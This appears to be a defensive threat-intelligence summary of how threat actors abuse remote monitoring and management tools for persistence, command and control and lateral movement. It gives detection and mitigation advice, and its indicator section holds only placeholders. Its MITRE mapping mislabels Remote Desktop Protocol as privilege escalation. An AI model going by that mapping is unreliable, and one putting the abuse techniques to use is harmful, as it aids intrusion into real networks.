Full Report
2025-03-07 • Proofpoint • Ole Villadsen, Proofpoint Threat Research Team, Selena Larson Open article on Malpedia
Analysis Summary
# Tool/Technique: Remote Monitoring and Management (RMM) Tooling
## Overview
Remote Monitoring and Management (RMM) tools, traditionally used legitimately by IT professionals for system administration and support, are increasingly being co-opted and misused by threat actors. Attackers leverage these tools to establish persistence, execute arbitrary commands, maintain command and control (C2), and exfiltrate data, often blending malicious activity with legitimate administrative traffic to evade detection.
## Technical Details
- Type: Tool (Legitimate Software Abused by Attackers)
- Platform: Windows, macOS, Linux (Generally wide-ranging based on the specific RMM product)
- Capabilities: Remote desktop access, file transfer, remote command execution, patch management, system monitoring.
- First Seen: Ongoing trend; specific products have been observed in use by threat actors over several years.
## MITRE ATT&CK Mapping
Due to the broad nature of RMMs, they map across numerous tactics. The most frequent mappings relate to established persistence and remote control:
- **TA0003 - Persistence**
- T1547.001 - Registry Run Keys / Startup Folder
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (RMMs often use standard HTTP/S traffic)
- **TA0005 - Defense Evasion**
- T1218 - Signed Binary Proxy Execution (If the RMM client is signed)
- **TA0004 - Privilege Escalation**
- T1021.001 - Remote Services: Remote Desktop Protocol (RMM GUI access)
## Functionality
### Core Capabilities
- **Remote Administration:** Providing interactive access to target systems, mimicking legitimate IT support interaction.
- **Execution Environment:** Utilizing the RMM agent's built-in capabilities to execute scripts (PowerShell, VBScript) or binaries directly on the endpoint.
- **File Transfer:** Moving payloads, tools, or stolen data between the attacker's machine and the compromised host.
### Advanced Features
- **Evasion through Legitimate Traffic:** Network communication often mimics standard administrative protocols, making network-based anomaly detection challenging.
- **Persistence Mechanism:** Once installed, RMM agents run as persistent services, allowing actors to regain access even after user logoffs or simple system reboots.
- **Lateral Movement:** Leveraging RMM access on one machine to deploy the agent or use the existing credentials/context to pivot to other systems within the network.
## Indicators of Compromise
Specific IoCs are highly dependent on the RMM product utilized (e.g., ConnectWise Control, TeamViewer, AnyDesk, ScreenConnect, Atera, etc.).
- File Hashes: [Highly variable, specific to the dropper or modified binary used to install the RMM]
- File Names: [Service executable names matching the vendor (e.g., `agent.exe`, `connectservice.exe`)]
- Registry Keys: [Service installation keys, often under `HKLM\SYSTEM\CurrentControlSet\Services\` pointing to the RMM executable]
- Network Indicators: [C2 communication channels highly dependent on the vendor's standard ports and domains (e.g., traffic destined for `*.hostedrmm.com` or known cloud service providers used by the application)]
- Behavioral Indicators: [Unusual deployment times for RMM agents, remote sessions initiated by non-standard user accounts, or elevated command execution through the RMM channel.]
## Associated Threat Actors
Ransomware groups and financially motivated cybercriminal operations are known to heavily favor RMM tools for initial access or post-exploitation activities.
- Examples often include groups that target MSPs (Managed Service Providers) or utilize initial access brokers who deliver RMM credentials.
## Detection Methods
- Signature-based detection: Limited utility unless hashes of specific, known-maliciously-deployed installers are known.
- Behavioral detection: Crucial for detecting the *misuse* of RMMs, such as:
- Monitoring for RMM processes executing suspicious child processes (e.g., PowerShell downloading further malware).
- Flagging RMM connections originating from known attacker IP ranges or connecting outside standard business hours.
- Auditing service installations or modifications related to known RMM software.
- YARA rules: Less effective for detecting the legitimate tooling itself, but useful for identifying wrappers or droppers used to deploy the RMM covertly.
## Mitigation Strategies
- **Principle of Least Privilege:** Ensure RMM credentials used by MSPs or internal IT adhere strictly to the required access levels.
- **Multi-Factor Authentication (MFA):** Enforce MFA on all RMM web portals and administration consoles.
- **Network Segmentation:** Restrict outbound connections from RMM agents to only necessary C2 infrastructure.
- **Application Whitelisting:** If possible, restrict RMM execution pathways or only permit known-good vendor executables.
- **Access Auditing:** Rigorously log and alert on administrative sessions, especially interactive remote sessions, looking for anomalous commands run post-connection.
## Related Tools/Techniques
- Dual-use legitimate software abuse listed in MITRE ATT&CK often encompasses RMMs.
- Other examples include use of legitimate tools like PsExec, PowerShell Empire (legacy/recreations), or scripting engines for similar C2/execution purposes.